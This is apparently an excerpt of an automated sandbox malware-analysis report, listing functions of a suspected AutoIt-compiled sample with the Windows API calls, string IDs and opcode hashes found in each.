                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$__fread_nolock
                                                        • String ID: FILE
                                                        • API String ID: 4029003684-3121273764
                                                        • Opcode ID: 494869bf6c0600faa95d88ee921b24c7b393bb60d3c7d61fba37f504584ffe41
                                                        • Instruction ID: a07f4be54f7b77ec6b01e657e2ec0e4c31f9f98a88fc74c5bfea82375709e19a
                                                        • Opcode Fuzzy Hash: 494869bf6c0600faa95d88ee921b24c7b393bb60d3c7d61fba37f504584ffe41
                                                        • Instruction Fuzzy Hash: 3241E632A00219BEDF11DBA4CC85FEF7BB9AF49714F000469F901AB1C1D7799A898751
                                                        Function 00739AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0073889E: __getptd_noexit.LIBCMT ref: 0073889E
                                                        • __getbuf.LIBCMT ref: 00739B8A
                                                        • __lseeki64.LIBCMT ref: 00739BFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                                        • String ID: pMt
                                                        • API String ID: 3311320906-3104781615
                                                        • Opcode ID: 621b62e4c688b532430b3f46c2133dee1a51c5506e9d1d778bee92e2280d8ec2
                                                        • Instruction ID: 2cc024e00fbbf5294f7b5deaae7f8028ac5bbb6aca9041a00f41aeff3ce5ce1e
                                                        • Opcode Fuzzy Hash: 621b62e4c688b532430b3f46c2133dee1a51c5506e9d1d778bee92e2280d8ec2
                                                        • Instruction Fuzzy Hash: 824124B1500B059EF7348F38D895A7AB7E49F45330F14861DE6AA872D3D7BCE8408B61
                                                        Function 0077A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0077A668
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0077A67D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: '
                                                        • API String ID: 3850602802-1997036262
                                                        • Opcode ID: d6ee97b5a07ac3d937ab5d1254233fd76fd7589dbccd1441744ecf207305b27b
                                                        • Instruction ID: 2a6c93790d33232821315ac1d19f049e9497202236441ab319a6a5e742ae2e8a
                                                        • Opcode Fuzzy Hash: d6ee97b5a07ac3d937ab5d1254233fd76fd7589dbccd1441744ecf207305b27b
                                                        • Instruction Fuzzy Hash: E8411775A00209AFEF14CFA8C880BDE7BB5BB48340F14406AE909EB381D774A951DFA1
                                                        Function 00779567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,?,?,?), ref: 0077961B
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00779657
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$DestroyMove
                                                        • String ID: static
                                                        • API String ID: 2139405536-2160076837
                                                        • Opcode ID: c63600c3eba46a6074f6800192c4263278a4800a4c2926fc0e44ab756a95b010
                                                        • Instruction ID: 59d4ecb945ebfa71db962bcff69d268cbcddc5851df1fa099954e75858b17ff4
                                                        • Opcode Fuzzy Hash: c63600c3eba46a6074f6800192c4263278a4800a4c2926fc0e44ab756a95b010
                                                        • Instruction Fuzzy Hash: 2631AB31100204AEEB109F24DC80BFB77A9FF583A0F00C61AF9A9C7190CA39AC91CB64
                                                        Function 00755B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00755BE4
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00755C1F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: 3c0926cb8837b0db80eefca780c69600e7c1220c5eb7a0fe63a0ab6c231bdb0a
                                                        • Instruction ID: 7980f8019fb2d942f2bd06d47e4c18cb342e5412a68d36a170d769518b9100f4
                                                        • Opcode Fuzzy Hash: 3c0926cb8837b0db80eefca780c69600e7c1220c5eb7a0fe63a0ab6c231bdb0a
                                                        • Instruction Fuzzy Hash: 0031A73160070AEBEB24CF98C999BEDBBF5EF05351F184019ED81961A1E7F89948DF60
                                                        Function 00766B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __snwprintf.LIBCMT ref: 00766BDD
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __snwprintf_memmove
                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                        • API String ID: 3506404897-2584243854
                                                        • Opcode ID: 99124fc94e8d033a1e325291ba703fbfdc125870024ea2d5c81dd382dab9ece7
                                                        • Instruction ID: cbd76be20817711d22aad4cfa329e4cdee31e19a7b51e059b50505e144278144
                                                        • Opcode Fuzzy Hash: 99124fc94e8d033a1e325291ba703fbfdc125870024ea2d5c81dd382dab9ece7
                                                        • Instruction Fuzzy Hash: B4218E71600518EACF11EFA8C886EED77A5AF45700F404469F906AB182DB78EA95CBA1
                                                        Function 007791DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00779269
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00779274
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: Combobox
                                                        • API String ID: 3850602802-2096851135
                                                        • Opcode ID: d00dbb934650cc46f1f212bcc86c8ca851b88b46a692289b9aaec1567a034c9e
                                                        • Instruction ID: a7b33c3faa5d4d10dcb5d19bb2b05c57330768ea4d6d699e3d0ae215d88d7097
                                                        • Opcode Fuzzy Hash: d00dbb934650cc46f1f212bcc86c8ca851b88b46a692289b9aaec1567a034c9e
                                                        • Instruction Fuzzy Hash: AB11B271301208BFEF21DF54DC80EAB376AEB883E4F118125FA1C97291D679DC518BA0
                                                        Function 0077970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0072C657
                                                          • Part of subcall function 0072C619: GetStockObject.GDI32(00000011), ref: 0072C66B
                                                          • Part of subcall function 0072C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0072C675
                                                        • GetWindowRect.USER32(00000000,?), ref: 00779775
                                                        • GetSysColor.USER32(00000012), ref: 0077978F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                        • String ID: static
                                                        • API String ID: 1983116058-2160076837
                                                        • Opcode ID: c5d2327e1fa347caaff6a746a1c364a81ea7aee7f8f03e6f52a45bc726b1ebbf
                                                        • Instruction ID: 4f3bbd86394e85bdba23e90dd29884d18877fd2c96f4f4107a0bbcb7647c93fc
                                                        • Opcode Fuzzy Hash: c5d2327e1fa347caaff6a746a1c364a81ea7aee7f8f03e6f52a45bc726b1ebbf
                                                        • Instruction Fuzzy Hash: 32113A72520209AFDF04DFB8DC45EEA7BB8EB08354F018529FA55D3241E779E851DB50
                                                        Function 00779424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowTextLengthW.USER32(00000000), ref: 007794A6
                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007794B5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: LengthMessageSendTextWindow
                                                        • String ID: edit
                                                        • API String ID: 2978978980-2167791130
                                                        • Opcode ID: fbd6e93754dff48e990d8fd9cccf3f6e1b56a76847de5a8719a2ff9378c31e80
                                                        • Instruction ID: 16f66eaf2b105e4715ccfccf808a22d7e4b913fdcb90e95bc946c26dc46089f9
                                                        • Opcode Fuzzy Hash: fbd6e93754dff48e990d8fd9cccf3f6e1b56a76847de5a8719a2ff9378c31e80
                                                        • Instruction Fuzzy Hash: 0A118F71102244AFEF108EA4DC84EEB3769EB053B8F50C724FA69931E0C779DC529B60
                                                        Function 00755C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00755CF3
                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00755D12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: InfoItemMenu_memset
                                                        • String ID: 0
                                                        • API String ID: 2223754486-4108050209
                                                        • Opcode ID: cfeded221565b9bbd311c630210426e47a379d863f0a4455f6fd1b3fd3343872
                                                        • Instruction ID: fcd3be708599ce764deb7e770e17564cee9b9328ec037ff5df610c36cb92511c
                                                        • Opcode Fuzzy Hash: cfeded221565b9bbd311c630210426e47a379d863f0a4455f6fd1b3fd3343872
                                                        • Instruction Fuzzy Hash: 6111E272E01759BBDB20DB98DC98BE977F8AB05311F194022EC41EB190D3B9ED08C7A0
                                                        Function 007653F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0076544C
                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00765475
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Internet$OpenOption
                                                        • String ID: <local>
                                                        • API String ID: 942729171-4266983199
                                                        • Opcode ID: 5ae1dd269682be0d361ba959c873874b54ffd619e74e4e43f9e2156baeb2dff5
                                                        • Instruction ID: 038d7d671ee08dd017e63d08e44aae51a10b474b9e6b44f7e8da42ca8bcd0a59
                                                        • Opcode Fuzzy Hash: 5ae1dd269682be0d361ba959c873874b54ffd619e74e4e43f9e2156baeb2dff5
                                                        • Instruction Fuzzy Hash: 7911A370141A61BADB258F51CC84EFBFF68FF12752F10816AF94656040EB7859C4E6F1
                                                        Function 0073B4BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00744557
                                                        • ___raise_securityfailure.LIBCMT ref: 0074463E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FeaturePresentProcessor___raise_securityfailure
                                                        • String ID: (}
                                                        • API String ID: 3761405300-1376107910
                                                        • Opcode ID: 5bdf10a44f08e8f9cc2b5b936be7fd752cdfcbe3ce98c17266eed129795c64af
                                                        • Instruction ID: 90d418142c2867d85bd15d30557474b0ef7321cb5ed54da889611656cc6438d0
                                                        • Opcode Fuzzy Hash: 5bdf10a44f08e8f9cc2b5b936be7fd752cdfcbe3ce98c17266eed129795c64af
                                                        • Instruction Fuzzy Hash: 5121E3B5602204DBD700EF64E9957447BB5FB48715F10E92BE5098A2A1E3BCA980CBCD
                                                        Function 0076ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: htonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 3832099526-2422070025
                                                        • Opcode ID: 6f4e4adee479917a33d6d9235a0ff49d6139dad73eab2fbaf6ffec9b7af44aa6
                                                        • Instruction ID: 59543e0e48b5c0031d34e6e248c3847ac2633ea2ae701d99e099477696abe44b
                                                        • Opcode Fuzzy Hash: 6f4e4adee479917a33d6d9235a0ff49d6139dad73eab2fbaf6ffec9b7af44aa6
                                                        • Instruction Fuzzy Hash: 3201D634200205ABCB209FA4C846FADB364EF48724F10851AF916AB2D1D779E805CB65
                                                        Function 0074C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0074C5E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1456604079-1403004172
                                                        • Opcode ID: 3043f79e7fefe3711dbdb82b82a5bd0cae9a0fa94075c4a3b867a34ed129d9b2
                                                        • Instruction ID: 73c350457a3c74b9463b1b696b4c387dccc747262857fbc17727f5c755a48c58
                                                        • Opcode Fuzzy Hash: 3043f79e7fefe3711dbdb82b82a5bd0cae9a0fa94075c4a3b867a34ed129d9b2
                                                        • Instruction Fuzzy Hash: 7401F571641118EFCB4AEFA8CC55DFE7369AF423107144619F472E32C2DB38A809C750
                                                        Function 0074C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 0074C4E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1456604079-1403004172
                                                        • Opcode ID: 695edd86d4ff768216e5ef00fadaeccbf6cd435be54e27479635912512e321c2
                                                        • Instruction ID: 8df97c4f61f69693270ca59315ef883ec6bda5a00e2c750514c7df484ecbe2d4
                                                        • Opcode Fuzzy Hash: 695edd86d4ff768216e5ef00fadaeccbf6cd435be54e27479635912512e321c2
                                                        • Instruction Fuzzy Hash: 32018F71642108ABCB5AEFA8CA66EFF77A89F45300F144019A942F31C2DB5C9E0996A1
                                                        Function 0074C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 0074C562
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
